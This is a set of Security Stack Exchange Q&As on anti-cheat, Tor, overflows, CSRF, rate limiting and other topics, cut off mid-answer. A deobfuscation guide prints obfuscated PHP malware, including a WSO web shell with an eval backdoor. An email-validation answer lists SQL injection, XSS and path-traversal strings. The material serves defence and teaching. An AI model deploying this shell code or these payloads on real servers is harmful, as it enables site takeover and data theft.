If so, then why do these companies not offer server side verification for video games, but rather continue to insist on trusting the client? It's less about insisting on trusting the client and more that there is no other viable anti-cheat model. Like DRM, and in fact, anti-cheat software like PB use a form of DRM, there's little that can be done. DRM software has mitigations in place to keep the client from poking too much, but it has to be put on the client to try to prevent the client from doing things that the media companies don't want the client doing. Anti-cheat technology relies on similar methodology. Information about the client is gathered, sent to the server, and if a client is seen as misbehaving, through whatever series of checks are done for the specific software, it can be banned at the server. At the end of the day, it comes down to risk management. Yes, don't trust the client is one of the first tenets of security. But for mitigating risks that occur at the client, there's a cost-benefit analysis, which is what risk management is. Is the cost of letting clients continue to bot and cheat worth losing customers who want a fair and fun game? Or should some mitigations be put in to place? PB and other software packages aren't there to entirely stop cheating, but aim to make it more expensive to cheat. Also there is another more subtle way of limiting the clients to cheat (wall hacks,...), mostly implicated by online only games but not limited to. This is achieved by not feeding the client side all data. For example unreal engine 3 has checks if an actor is in your vicinity of visibility, if this check is positive, the server sends YOU the exact location as well as your opponent YOURS. So to say, only the server knows all positions, actions and movements of all actors on the gaming instance. This can be read in the documentation of the unreal engine 3 / Client Server Model in the paragraph cheating, to be found here: https://udn.epicgames.com/Three/ClientServerModel.html So to say, with advanced engines/network code and Client Server models, it is not necessarily needed to trust the client 100%. The Server can decide beforehand what the client should know, effectively LIMITING the possibilities of hacks. To go even further, the server can decide what it SHOULD know itself, not to get distracted or confused by clients sending forged packets.
{ "source": [ "https://security.stackexchange.com/questions/115331", "https://security.stackexchange.com", "https://security.stackexchange.com/users/102088/" ] }
115,361
Tor is known to encrypt the transferred content and the meta information by layering the encryption. I know there have been correlation attacks that deanonymized some users by federal agencies. Why do they not take over the system? There are ~7000 Relays, which seems quite few. If they provide 14,000 further relays they would be able to decrypt a great deal of information and reveal the identities of users and hidden services. So why don't they?
They might do it already, there is a known technique to dedicate malicious and powerful nodes to the network to be able to take control of some of the traffic. Tor does not advertise itself to be able to protect against adversaries that have control over a fair part of the internet . While there are techniques to check the validity of the nodes if you have control over the internet(a fair part of the network) you can de-anonymize nodes. Under Tor's website, the FAQ page : What attacks remain against onion routing? it is possible for an observer who can view both you and either the destination website or your Tor exit node to correlate timings of your traffic as it enters the Tor network and also as it exits. Tor does not defend against such a threat model. In a more limited sense, note that if a censor or law enforcement agency has the ability to obtain specific observation of parts of the network, it is possible for them to verify a suspicion that you talk regularly to your friend by observing traffic at both ends and correlating the timing of only that traffic. Again, this is only useful to verify that parties already suspected of communicating with one another are doing so. In most countries, the suspicion required to obtain a warrant already carries more weight than timing correlation would provide. Furthermore, since Tor reuses circuits for multiple TCP connections, it is possible to associate non anonymous and anonymous traffic at a given exit node, so be careful about what applications you run concurrently over Tor. Perhaps even run separate Tor clients for these applications. About Tor network takedown: They may not have enough incentives to block the whole system. After all it's a highly decentralized, international network of nodes. If you shut down a node, another one will pop up so it's not trivial to take the whole thing down. There are also obfuscation techniques Tor uses to hide itself from ISPs and censorship systems. They can't flip a switch and then Tor is down. About adding malicious nodes to decrypt the traffic, it's not trivial either. You don't need any relay node, you need an exit node to get access to unencrypted traffic (Another layer of encryption may still be present, e.g. HTTPS). Tor also monitors exit nodes for malicious activity and actively blocks them. I'm not saying your provided scenario is not possible, I'm just saying it's not trivial.
{ "source": [ "https://security.stackexchange.com/questions/115361", "https://security.stackexchange.com", "https://security.stackexchange.com/users/102112/" ] }
115,461
We've been getting a lot of noise regarding hacked PHP files here, and it's taking a lot of time to answer these questions. In many cases, they are off-topic. We've had a discussion about this on Information Security Meta, and many people want these posts to stay. However, nearly every single post about obfuscated PHP can be answered in almost the same way. I think we can condense the majority of the methods for de-obfuscating hacked files into one single question & answer thread. This leads to the question many people are asking: how do I de-obfuscate malicious PHP code that I found on my server, how did it happen, and what do I do?!
Fortunately, almost all PHP scripts can be deobfuscated with 4 simple methods. We're going to use these four methods to create a canonical answer. Before we begin, let's collect a list of common tools that assist in deobfuscating these malicious files so we can do the work ourselves. Common tools that aid in deobfuscation UnPHP . This greatly aids in de-obfuscating scripts that have nested obfuscation in excess of 100 nested functions. In many cases, this website, and those like it, should be the first one for you to visit. However, in some cases, UnPHP cannot deobfuscate the initial payload. In those cases, other tools we'll list will suffice. PHP Beautifier . This is an excellent tool for splitting up single-line files which are otherwise very difficult to read. Base64 decoders . I'm linking to Google search for this one. Some of these Base64 websites look kind of shady, so if you prefer to use an offline version without visiting those websites, I whipped up a quick tool for Windows (get Base64Decode.exe ). Source code is available as well. PHP Sandbox . You can also look for other sandboxes on google. We'll use this to run echo commands when needed. Commonly exploited PHP functions The vast majority of hacks are using some form of eval , or preg_place , or both: eval() . This can be an evil function , as it allows arbitrary execution of PHP code. Just finding this function in use on your website could be an indication that you've been hacked. preg_replace() . Frequently used with eval() to allow for arbitrary code execution . There are plenty of good uses for preg_replace() , but if you don't know how it got there, and especially if it appears alongside obfuscated code, that's a clear indication that you've been hacked. Additional Information . To prevent this answer from becoming too large, I'm going to link to this question about commonly-exploited PHP functions. Also, check out the OWASP PHP Cheat Sheet . While base64_decode is used in nearly all of the hacks we've come across, it mainly serves as a layer of obfuscation. Common obsfuscation formats There are several different ways that hackers obfuscate their code. Let's list some of the common techniques so we know how to spot them and then decode them: Hex Encoding . You'll be looking for the HEX number on that table list. In PHP, these can be represented by backslash x, followed by a number or letter. Examples: \x48 = H \x34 = 4 \x78 = x However, they aren't necessarily represented only by \x . They could be \# as well. 2. Unicode strings . Almost the same as above, but \u# instead of \x# . Examples: \u004D = M \u0065 = e \u0020 = (space) \u0070 = p \u006c = l \u0073\ = s Base64 encoding . Base64 is a bit different than the aforementioned methods of obfuscation, but is still relatively easy to decode. Example strings: SSBsaWtlIGRvbnV0cw== = I like donuts ZXZhbChiYXNlNjRfZGVjb2RlKCJoYXgiKSk7 = eval(base64_decode("hax")); QXNzdW1pbmcgZGlyZWN0IGNvbnRyb2w= = Assuming direct control Garbage stored in a string, split by for loops, regex, etc . You'll have to decode that yourself, as they vary considerably. Fortunately, many of the aforementioned methods should assist you in de-obfuscating this time. How can I deobfuscate PHP Files by myself? Because we cannot help (we can, I can, but they won't let me! :P) with every single PHP malware snippet out there, it would be better to teach you how to do it. Learning how to do this yourself will help you learn more about PHP, and more about what's going on. Let's put our tools to use, and use two previous examples of PHP deobfuscation on this website. Deobfuscation Example #1 Refer to this question . Copy and paste the code into UnPHP : <?php preg_replace("\xf4\x30\41\x1f\x16\351\x42\x45"^"\xd7\30\xf\64\77\312\53\40","\373\x49\145\xa9\372\xc0\x72\331\307\320\175\237\xb4\123\51\x6c\x69\x6d\x72\302\xe1\117\x67\x86\44\xc7\217\x64\260\x31\x78\x99\x9c\200\x4"^"\273\40\13\312\x96\265\x16\xbc\x98\xbf\x13\374\xd1\x7b\x4b\15\32\x8\104\xf6\xbe\53\2\345\113\xa3\352\114\x92\155\111\xbb\xb5\251\77","\206\65\x30\x2f\160\x2\77\x56\x25\x9a\xf\x6\xec\317\xeb\x10\x86\x0\244\364\255\x57\x53\xf3\x8d\xb9\13\x5c\2\272\xc5\x97\215\347\372\x83\x74\367\x28\x2e\xd1\x36\x72\177\223\x3c\xb2\x1a\x96\271\127\x3b\337\xcf\277\317\xb7\4\214\271\xb2\235\71\xa6\x3d\205\325\127\336\70\xd6\x7c"^"\312\7\x58\131\x12\x55\152\146\151\250\76\166\210\207\x9b\x22\xdf\127\xcc\x9e\xe1\144\x11\302\324\324\x73\x2c\133\213\374\xf8\xe9\240\313\xf0\x38\305\x6e\x54\xb2\4\x24\x4f\360\105\213\152\xf4\xee\64\x4d\275\x88\206\xa1\325\x35\265\xc3\xd0\xca\177\xd5\x5f\xc6\xe0\40\274\x55\xb5\x41"); ?> And you'll see it doesn't deobfuscate it for us. Bummer. We're going to have to do some extra work. Note the strings, along with it's concatenations. Argh! It's so ugly and confusing! What are we going to do with these strings? This is where the PHP sandbox comes into play. <?php echo "\xf4\x30\41\x1f\x16\351\x42\x45"^"\xd7\30\xf\64\77\312\53\40" . "<br/>"; echo "\373\x49\145\xa9\372\xc0\x72\331\307\320\175\237\xb4\123\51\x6c\x69\x6d\x72\302\xe1\117\x67\x86\44\xc7\217\x64\260\x31\x78\x99\x9c\200\x4"^"\273\40\13\312\x96\265\x16\xbc\x98\xbf\x13\374\xd1\x7b\x4b\15\32\x8\104\xf6\xbe\53\2\345\113\xa3\352\114\x92\155\111\xbb\xb5\251\77" . "<br/>"; echo "\206\65\x30\x2f\160\x2\77\x56\x25\x9a\xf\x6\xec\317\xeb\x10\x86\x0\244\364\255\x57\x53\xf3\x8d\xb9\13\x5c\2\272\xc5\x97\215\347\372\x83\x74\367\x28\x2e\xd1\x36\x72\177\223\x3c\xb2\x1a\x96\271\127\x3b\337\xcf\277\317\xb7\4\214\271\xb2\235\71\xa6\x3d\205\325\127\336\70\xd6\x7c"^"\312\7\x58\131\x12\x55\152\146\151\250\76\166\210\207\x9b\x22\xdf\127\xcc\x9e\xe1\144\x11\302\324\324\x73\x2c\133\213\374\xf8\xe9\240\313\xf0\x38\305\x6e\x54\xb2\4\x24\x4f\360\105\213\152\xf4\xee\64\x4d\275\x88\206\xa1\325\x35\265\xc3\xd0\xca\177\xd5\x5f\xc6\xe0\40\274\x55\xb5\x41" . "<br/>"; ?> Now that we've echo'd the contents, we can rebuild it to get the following results: <?php preg_replace("#(.+)#ie", "@include_once(base64_decode("\1"));", "L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc"; ?> Note the string, L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc ? That looks an awful lot like the Base64 encoding we talked about earlier! Let's try to decode it and see if we're right: /home4/mitzvahc/public_html/assets/img/logo_small.png After opening the logo_small.png file in some kind of text editor, we find something like this: eval(gzuncompress(base64_decode("evil_payload"))); Oh no!!! If you run the file contents through UnPHP , you should get your decoded results. Deobfuscation Example #2 Refer to this question : Remember earlier when we mentioned ASCII encoding? Take a look at the code: <?php ${"\x47LOB\x41\x4c\x53"}["\x76\x72vw\x65y\x70\x7an\x69\x70\x75"]="a";${"\x47\x4cOBAL\x53"}["\x67\x72\x69u\x65\x66\x62\x64\x71c"]="\x61\x75\x74h\x5fpas\x73";${"\x47\x4cOBAL\x53"}["\x63\x74xv\x74\x6f\x6f\x6bn\x6dju"]="\x76";${"\x47\x4cO\x42A\x4cS"}["p\x69\x6fykc\x65\x61"]="def\x61ul\x74\x5fu\x73\x65_\x61j\x61\x78";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["i\x77i\x72\x6d\x78l\x71tv\x79p"]="defa\x75\x6c\x74\x5f\x61\x63t\x69\x6f\x6e";${"\x47L\x4fB\x41\x4cS"}["\x64\x77e\x6d\x62\x6a\x63"]="\x63\x6fl\x6f\x72";${${"\x47\x4c\x4f\x42\x41LS"}["\x64\x77\x65\x6dbj\x63"]}="\x23d\x665";${${"\x47L\x4fB\x41\x4c\x53"}["\x69\x77\x69rm\x78\x6c\x71\x74\x76\x79p"]}="\x46i\x6cesM\x61n";$oboikuury="\x64e\x66a\x75\x6ct\x5fc\x68\x61\x72\x73\x65t";${${"\x47L\x4f\x42\x41\x4cS"}["p\x69oy\x6bc\x65\x61"]}=true;${$oboikuury}="\x57indow\x73-1\x325\x31";@ini_set("\x65r\x72o\x72_\x6cog",NULL);@ini_set("l\x6fg_er\x72ors",0);@ini_set("max_ex\x65\x63\x75\x74\x69o\x6e\x5f\x74im\x65",0);@set_time_limit(0);@set_magic_quotes_runtime(0);@define("WS\x4f\x5fVE\x52S\x49ON","\x32.5\x2e1");if(get_magic_quotes_gpc()){function WSOstripslashes($array){${"\x47\x4c\x4f\x42A\x4c\x53"}["\x7a\x64\x69z\x62\x73\x75e\x66a"]="\x61\x72r\x61\x79";$cfnrvu="\x61r\x72a\x79";${"GLOB\x41L\x53"}["\x6b\x63\x6ct\x6c\x70\x64\x73"]="a\x72\x72\x61\x79";return is_array(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x7ad\x69\x7ab\x73\x75e\x66\x61"]})?array_map("\x57SOst\x72\x69\x70\x73\x6c\x61\x73\x68\x65s",${${"\x47\x4cO\x42\x41LS"}["\x6b\x63\x6c\x74l\x70\x64\x73"]}):stripslashes(${$cfnrvu});}$_POST=WSOstripslashes($_POST);$_COOKIE=WSOstripslashes($_COOKIE);}function wsoLogin(){header("\x48\x54TP/1.\x30\x204\x30\x34\x20\x4eo\x74 \x46ound");die("4\x304");}function WSOsetcookie($k,$v){${"\x47\x4cO\x42ALS"}["\x67vf\x6c\x78m\x74"]="\x6b";$cjtmrt="\x76";$_COOKIE[${${"G\x4c\x4f\x42\x41LS"}["\x67\x76\x66\x6cxm\x74"]}]=${${"GLO\x42\x41\x4cS"}["\x63\x74\x78\x76t\x6f\x6fknm\x6a\x75"]};$raogrsixpi="\x6b";setcookie(${$raogrsixpi},${$cjtmrt});}$qyvsdolpq="a\x75\x74\x68\x5f\x70\x61s\x73";if(!empty(${$qyvsdolpq})){$rhavvlolc="au\x74h_\x70a\x73\x73";$ssfmrro="a\x75t\x68\x5fpa\x73\x73";if(isset($_POST["p\x61ss"])&&(md5($_POST["pa\x73\x73"])==${$ssfmrro}))WSOsetcookie(md5($_SERVER["H\x54\x54P_\x48\x4f\x53T"]),${${"\x47L\x4f\x42\x41\x4c\x53"}["\x67\x72\x69\x75e\x66b\x64\x71\x63"]});if(!isset($_COOKIE[md5($_SERVER["\x48T\x54\x50\x5f\x48O\x53\x54"])])||($_COOKIE[md5($_SERVER["H\x54\x54\x50_H\x4fST"])]!=${$rhavvlolc}))wsoLogin();}function actionRC(){if(!@$_POST["p\x31"]){$ugtfpiyrum="a";${${"\x47\x4c\x4fB\x41LS"}["\x76r\x76w\x65\x79\x70z\x6eipu"]}=array("\x75n\x61m\x65"=>php_uname(),"p\x68\x70\x5fver\x73\x69o\x6e"=>phpversion(),"\x77s\x6f_v\x65\x72si\x6f\x6e"=>WSO_VERSION,"saf\x65m\x6f\x64e"=>@ini_get("\x73\x61\x66\x65\x5fm\x6fd\x65"));echo serialize(${$ugtfpiyrum});}else{eval($_POST["\x70\x31"]);}}if(empty($_POST["\x61"])){${"\x47L\x4fB\x41LS"}["\x69s\x76\x65\x78\x79"]="\x64\x65\x66\x61\x75\x6ct\x5f\x61c\x74i\x6f\x6e";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x75\x6f\x65c\x68\x79\x6d\x7ad\x64\x64"]="\x64\x65\x66a\x75\x6c\x74_\x61\x63\x74\x69\x6fn";if(isset(${${"\x47L\x4f\x42\x41LS"}["\x69\x77ir\x6d\x78lqtv\x79\x70"]})&&function_exists("\x61ct\x69\x6f\x6e".${${"\x47L\x4f\x42\x41\x4cS"}["\x75o\x65ch\x79\x6d\x7a\x64\x64\x64"]}))$_POST["a"]=${${"\x47\x4c\x4f\x42ALS"}["i\x73\x76e\x78\x79"]};else$_POST["a"]="\x53e\x63\x49\x6e\x66o";}if(!empty($_POST["\x61"])&&function_exists("actio\x6e".$_POST["\x61"]))call_user_func("\x61\x63\x74\x69\x6f\x6e".$_POST["a"]);exit; ?> Let's copy and paste this into UnPHP . Once the results are in, we can finally see what it's doing, but it looks all smashed together. Let's paste it into the PHP Beautifier . Now it's a lot easier to read ! Deobfuscating variable names If you're not able to deobfuscate variable names through any of the previously-mentioned methods, then deobfuscating those variable names can be a manual, time-consuming process. Fortunately, looking for common malware patterns such as shutting off the log files, using eval() or preg_replace() with obfuscation indicates that something is wrong. Obfuscation is the wrong approach , so if you find code obfuscated on your website, you should assume you've been hacked. You should not be obfuscating your code. Security at the expense of usability is not security. Deobfuscation Risks Trying to decode these files on your own web server is not safe for a lot of reasons, some of which may be unknown to us. Do not try to deobfuscate PHP files on your own web server. You could inadvertently introduce additional backdoors, or assist the malware in spreading itself because many of the scripts load functions remotely. That's nice, but how did I get hacked? This is really too broad to answer without us having access to everything on your web server, including logs. You may have incorrect hardening on your Content Management System (CMS) installation, or there may be a vulnerability somewhere in your web stack. You can check these links if they're part of your CMS: Joomla Security Checklist WordPress Hardening Drupal Security Checklist If your CMS isn't listed, look for hardening/security checklists for your CMS installation. If you are not using a CMS, but rather your own code, then it's on you to fix your security holes. The OWASP Cheat Sheet serves as a good starting point to finding and fixing common vulnerabilities. Remember, only you can prevent shell access. There could be any number of reasons why this is happening... but the bottom line is: either your web host has been hacked, or you have an exploit on your website which allows malicious individuals to insert additional code and give them full control over your website... meanwhile, they are attacking your visitors . So what do I do?! You should read this Q&A: How do I deal with a compromised server?
{ "source": [ "https://security.stackexchange.com/questions/115461", "https://security.stackexchange.com", "https://security.stackexchange.com/users/87119/" ] }
115,507
When I look at the exploits from the past few years related to implementations, I see that quite a lot of them are from C or C++, and a lot of them are overflow attacks. Heartbleed was a buffer overflow in OpenSSL; Recently, a bug in glibc was found that allowed buffer overflows during DNS resolving; that's just the ones I can think off right now, but I doubt that these were the only ones that A) are for software written in C or C++ and B) are based on a buffer overflow. Especially concerning the glibc bug, I read a comment that states that if this happened in JavaScript instead of in C, there wouldn't have been an issue. Even if the code was just compiled to Javascript, it wouldn't have been an issue. Why are C and C++ so vulnerable to overflow attacks?
C and C++, contrary to most other languages, traditionally do not check for overflows. If the source code says to put 120 bytes in an 85-byte buffer, the CPU will happily do so. This is related to the fact that while C and C++ have a notion of array , this notion is compile-time only. At execution time, there are only pointers, so there is no runtime method to check for an array access with regards to the conceptual length of that array. By contrast, most other languages have a notion of array that survives at runtime, so that all array accesses can be systematically checked by the runtime system. This does not eliminate overflows: if the source code asks for something nonsensical as writing 120 bytes in an array of length 85, it still makes no sense. However, this automatically triggers an internal error condition (often an "exception", e.g. an ArrayIndexOutOfBoundException in Java) that interrupts normal execution and does not let the code proceed. This disrupts execution, and often implies a cessation of the complete processing (the thread dies), but it normally prevents exploitation beyond a simple denial-of-service. Basically, buffer overflow exploits requires the code to make the overflow (reading or writing past the boundaries of the accessed buffer) and to keep on doing things beyond that overflow. Most modern languages, contrary to C and C++ (and a few others such as Forth or Assembly), don't allow the overflow to really occur and instead shoot the offender. From a security point of view this is much better.
{ "source": [ "https://security.stackexchange.com/questions/115507", "https://security.stackexchange.com", "https://security.stackexchange.com/users/34161/" ] }
115,578
Can I simply build a webserver, make its hostname " google.com ", create a CSR off that server, and send that to a Certificate Authority for signing? Let's say I pick the cheapest and dodgiest outfit I can find. Will that work? What mechanisms are in place to stop people from doing this? I am well aware that I won't receive any traffic destined to google.com due to the DNS records pointing to the real Google, but I could MitM attack any Google traffic using this method. I could also redirect local traffic to my own server without the users knowing any better.
This is more of a problem than you think, particularly for a company like Google, because they're a frequent target for this type of shenanigans. But there are several layers of safeguards, and our protection is getting better over time. Your first line of defense is the Certificate Authority. They shouldn't let certificates be signed inappropriately. Each CA has its own mechanism for verifying your entitlement to purchase a cert for a given domain, but typically it includes having you do one or more of the following: Verify ownership of the email address listed in the WHOIS info for the domain. Verify ownership of an email address that follows one of several predetermined patterns on the domain (e.g. "administrator@{domain}") Create a specific DNS record on the domain Make a specific change to the website hosted at that domain But with as many CAs as we have, a surprising number of inappropriate certs get issued. This is a case of, "you had literally ONE job," but we have to accept that mistakes will happen. Certificate Transparency was created to help audit the CAs There's a surprising lack of accountability and transparency on the part of CAs, so Google decided to do something about it with Certificate Transparency . This is a public log of every certificate that the CA signs; if a cert doesn't show up in the log then it's not valid, and the log is append-only; you can't go back and scrub your history. It's still relatively new, but Chrome already requires it on certain CAs, including all EV CAs. The idea is that you can follow the log and see if your domain shows up when it shouldn't. Tools are still evolving to make this simpler, but it's a very promising technology. Your final line of defense is key pinning The more secure browsers will allow domain owners to "pin" one or more public keys to their domain. This is an end-around the whole PKI system and injects the trust directly into the browser. Domain owners can, via HTTP header, tell the browser to only allow certs with specific public keys, and can in fact ship that assertion pre-installed on the browser itself. This prevents an unauthorized certificate from being used, even if it has a valid CA signature. DNSSEC and DANE is where this is eventually going to go Probably. With DNSSEC, you can sign your DNS records, which means that you can put your public key signature right there in DNS. Which means you don't need a third-party certificate authority to sign your keys. That's a pretty elegant solution, but DNSSEC is a way off still; you can't use it with a number of OSes, and adoption is positively glacial.
{ "source": [ "https://security.stackexchange.com/questions/115578", "https://security.stackexchange.com", "https://security.stackexchange.com/users/102322/" ] }
115,648
A system we're introducing into the organization is not using any traditional hashing function that I can find. I've been assigned to "approve" it by black-box testing. I suspect passwords are simply being obfuscated or encrypted (not hashed) since the length of the result changes with password length (though there is some minimum, it seems - perhaps padding?). Here is some data: password : result 1 : TG3432WB7VU= 11 : r8ahLkJGWbY= 111 : E7fXdNqEWAA= 11111111 : FIcx3a00R4e GhFyHjD56qw== 1111111111 : FIcx3a00R4e vxqEuQkZZtg== 2111111111 : GPwnH80qEAC vxqEuQkZZtg== The result is obviously base64, but doesn't decode to anything readable. Before I knew that the result's length changed, I tried taking the decoded bytes and treating them as MD5 and other hashing functions, but that obviously didn't pan out. Now that I know the result changes in length, I'm considering other, worse, alternatives. Of note are the two bold parts above: they're identical in two different passwords. So either each 8 bytes are being processed independently (why?) or there's some polyalphabetic substitution going on(?). Update: Any character, including Unicode characters, is accepted by the system for passwords. Repeating a 3-byte character 8 times does result in a 24 byte long "hash".
I highly suspect this is a self rolled, or at least very outdated method. It is very weak by modern standards and should not be used to protect anything important. Short passwords could be cracked with no more than 2^64 brute force attempts, which is quite possible with even a normal computer. If both halves of the result are independent, even with fairly long passwords, 2*2^64 brute force attempts could crack it (so 2^65 attempts). There are likely further weaknesses in the algorithm that make it weaker than described here. Another interesting point to test would be 2111111111 and see if the second part of the result remains the same. If the second part doesn't change, this is definitely a weak algorithm. Edit: Seeing that the results of the 2111111111 test are the same for the second half, this is definitely a weak algorithm and should not be used to protect anything sensitive! I have included the relevant comparison below: 1111111111 : FIcx3a00R4e vxqEuQkZZtg == 2111111111 : GPwnH80qEAC vxqEuQkZZtg == Edit: Another interesting test would be what Ricky Demer suggests below: The next thing to check is that it handles the 8-byte blocks identically. ​ What are the "hashes" of aaaaaaaabbbbbbbbc and bbbbbbbbaaaaaaaac? ​ ​ ​ ​ – Ricky Demer Feb 25 at 6:44 If it handled the 8-byte blocks identically, it is even worse for even long passwords, no matter what the length. It would require just 2^64 brute force attempts as pointed out by Neil in the comments. Once someone made a table of what each possibility calculates to, this algorithm would be practically useless. There are probably even more weaknesses to this algorithm remaining to be discovered. Bottom line: I do not recommend using this algorithm regardless of the results of the last test. We have already seen enough to know it is weak. Something with a higher bit encryption / hash scheme, salt, long computation time etc... would be much better, and I would recommend going with one of the existing thoroughly tested methods. Self rolled encryption / hashing has not had the benefit of extensive testing that most of the main stream methods have.
{ "source": [ "https://security.stackexchange.com/questions/115648", "https://security.stackexchange.com", "https://security.stackexchange.com/users/102433/" ] }
115,671
I'm trying to secure a REST API, our situation is that every client connecting to this API will also have a certificate signed by our own CA. Because of this, I think we can use the client certificate as an authentication mechanism, and install our root certificate on the webserver for verification and then use mutual authentication through HTTPS. We intend to do this with nginx so it's as simple as requiring nginx to have client verification on. However, I'm unclear about whether I should still timestamp and sign each request, should I still worry about message integrity and replay attack? Is there anything other attacks I should guard against?
I highly suspect this is a self rolled, or at least very outdated method. It is very weak by modern standards and should not be used to protect anything important. Short passwords could be cracked with no more than 2^64 brute force attempts, which is quite possible with even a normal computer. If both halves of the result are independent, even with fairly long passwords, 2*2^64 brute force attempts could crack it (so 2^65 attempts). There are likely further weaknesses in the algorithm that make it weaker than described here. Another interesting point to test would be 2111111111 and see if the second part of the result remains the same. If the second part doesn't change, this is definitely a weak algorithm. Edit: Seeing that the results of the 2111111111 test are the same for the second half, this is definitely a weak algorithm and should not be used to protect anything sensitive! I have included the relevant comparison below: 1111111111 : FIcx3a00R4e vxqEuQkZZtg == 2111111111 : GPwnH80qEAC vxqEuQkZZtg == Edit: Another interesting test would be what Ricky Demer suggests below: The next thing to check is that it handles the 8-byte blocks identically. ​ What are the "hashes" of aaaaaaaabbbbbbbbc and bbbbbbbbaaaaaaaac? ​ ​ ​ ​ – Ricky Demer Feb 25 at 6:44 If it handled the 8-byte blocks identically, it is even worse for even long passwords, no matter what the length. It would require just 2^64 brute force attempts as pointed out by Neil in the comments. Once someone made a table of what each possibility calculates to, this algorithm would be practically useless. There are probably even more weaknesses to this algorithm remaining to be discovered. Bottom line: I do not recommend using this algorithm regardless of the results of the last test. We have already seen enough to know it is weak. Something with a higher bit encryption / hash scheme, salt, long computation time etc... would be much better, and I would recommend going with one of the existing thoroughly tested methods. Self rolled encryption / hashing has not had the benefit of extensive testing that most of the main stream methods have.
{ "source": [ "https://security.stackexchange.com/questions/115671", "https://security.stackexchange.com", "https://security.stackexchange.com/users/53572/" ] }
115,794
I've seen several blanket statements on the web to the effect that you don't need CSRF protection for GET requests. But many web applications have GET requests that return sensitive data, right? Then wouldn't you want to protect those against CSRF attacks? Am I missing something, or are these blanket statements assuming that the data the GET request gives is unimportant? Examples of blanket recommendations gainst using CSRF tokens with GET: https://security.stackexchange.com/a/90027/5997 Therefore, if a website has kept to the standard and only implements "unsafe" actions as POSTs, then here only POST requests are vulnerable. http://www.django-rest-framework.org/topics/ajax-csrf-cors/ Ensure that the 'safe' HTTP operations, such as GET, HEAD and OPTIONS cannot be used to alter any server-side state. The assumption here is that if GET doesn't modify state, it's not worth protecting. http://sakurity.com/blog/2015/03/04/hybrid_api_auth.html contains a code line that suggests this approach: # 1) verify CSRF token for all non-GET requests
CSRF protection is only needed for state-changing operations because of the same-origin policy . This policy states that: a web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin. So the CSRF attack will not be able to access the data it requests because it is a cross-site (that's the CS in CSRF ) request and prohibited by the same-origin policy. So illicit data access is not a problem with CSRF. As a CSRF attack can execute commands but can't see their results, it is forced to act blindly. For example, a CSRF attack can tell your browser to request your bank account balance, but it can't see that balance. This is obviously a pointless attack (unless you're trying to DDoS the bank server or something). But it is not pointless if, for example, the CSRF attack tells your browser to instruct your bank to transfer money from your account to the attacker's account. The success or failure page for the transfer is inaccessible to the attacking script. Fortunately for the attacker, they don't need to see the bank's response, they just want the money in their account. As only state-changing operations are likely to be targets of CSRF attacks, only they need CSRF defenses.
{ "source": [ "https://security.stackexchange.com/questions/115794", "https://security.stackexchange.com", "https://security.stackexchange.com/users/5997/" ] }
116,079
I have noticed several questions on Stack Overflow, like this one, about executing commands with root privileges using PHP. The answer proposed to add the line www-data ALL=(ALL) NOPASSWD: ALL to the /etc/sudoers.d file. Is it a safe approach to solve the problem? Does it create a vulnerability?
This... is atrocious. The whole point of running Web things as a non-root user is damage containment: in case the Web server process gets hijacked through some vulnerability, at least the attacker won't obtain full control of the machine, since he will be constrained by the limitations of the non-root account www-data . But if you give www-data a way to run every command it wishes to, with the rights of any user (including root ), and without any further authentication, then you just lost that damage containment feature. To be fair, www-data + sudo is slightly better than simply running everything as root , because the going-to-root has to be explicit; therefore, common flaws like a PHP script writing files in improper locations would be harder to exploit. But still, making www-data a member of the sudoers looks like a poor idea.
{ "source": [ "https://security.stackexchange.com/questions/116079", "https://security.stackexchange.com", "https://security.stackexchange.com/users/100038/" ] }
116,113
I need to limit login attempts. One option is to count attempts by IP address and then block the IP. The disadvantage is that different users may have the same IP address. Another option is to limit by an account identifier (username or email) and then block the account (it can be activated manually by support). The only disadvantage I can think of is that malicious users can guess usernames and block them... But other than that, it feels more secure because malicious users can use different IPs, right? What's the recommended way to do it?
I would say that you should do both. If you only rate limit on IP address, an attacker controlling a bot net could brute force an account with a weak password. If you have 10 000 computers with unique IPs and each one is allowed four attempts per hour you can try almost a million passwords per day. If you only rate limit on username, an attacker with a list of existing usernames could brute force accounts with a weak password. Chances are that a few of your users use one of the top 10 passwords, so if you try those on all accounts you will get in somewhere. Of course you could do all sorts of combinations. For instance you might only block a username once X different IPs have failed to log in with it, so that an attacker trying to block a user from logging in needs to work a bit for it.
{ "source": [ "https://security.stackexchange.com/questions/116113", "https://security.stackexchange.com", "https://security.stackexchange.com/users/22588/" ] }
116,116
I have been using this RFC822-compliant regular expression for email validation. Pen testers on HackerOne have used the following horrendous email addresses which satisfy the regex: '/**/OR/**/1=1/**/--/**/@a.a [email protected]&a=////etc/passwd [email protected]&&a=a %00%[email protected] Are those email addresses valid? How can I do safe email validation?
Are those email addresses valid? Yes, they are. See for example here or with a bit more explanation here . For a nice explanation on how emails may look, see the informational RFC3696 . The more technical RFCs are linked there as well. Attacks possible in the local part of an Email Address Without quotes, local-parts may consist of any combination of alphabetic characters, digits, or any of the special characters ! # $ % & ' * + - / = ? ^ _ ` . { | } ~ period (".") may also appear, but may not be used to start or end the local part, nor may two or more consecutive periods appear. Stated differently, any ASCII graphic (printing) character other than the at-sign ("@"), backslash, double quote, comma, or square brackets may appear without quoting. If any of that list of excluded characters are to appear, they must be quoted. So the rule is more or less: most characters can be part of the local part, except for @\",[] , those must be in-between " (except of course " itself, which has to be escaped when in a quoted string). There are also rules on where and when to quote and how to handle comments, but that's less relevant to your question. The point here is that many attacks can be part of the local part of an email address, for example: '/**/OR/**/1=1/**/--/**/@a.a "<script>alert(1)</script>"@example.com " onmouseover=alert(1) foo="@example.com "../../../../../test%00"@example.com ... Attacks possible in the domain part of an Email Address The exact structure of the domain part can be seen in RFC2822 or RFC5322 : addr-spec = local-part "@" domain local-part = dot-atom / quoted-string / obs-local-part domain = dot-atom / domain-literal / obs-domain domain-literal = [CFWS] "[" *([FWS] dcontent) [FWS] "]" [CFWS] dcontent = dtext / quoted-pair dtext = NO-WS-CTL / ; Non white space controls %d33-90 / ; The rest of the US-ASCII %d94-126 ; characters not including "[", ; "]", or "\" Where: dtext = %d33-90 / ; Printable US-ASCII %d94-126 / ; characters not including 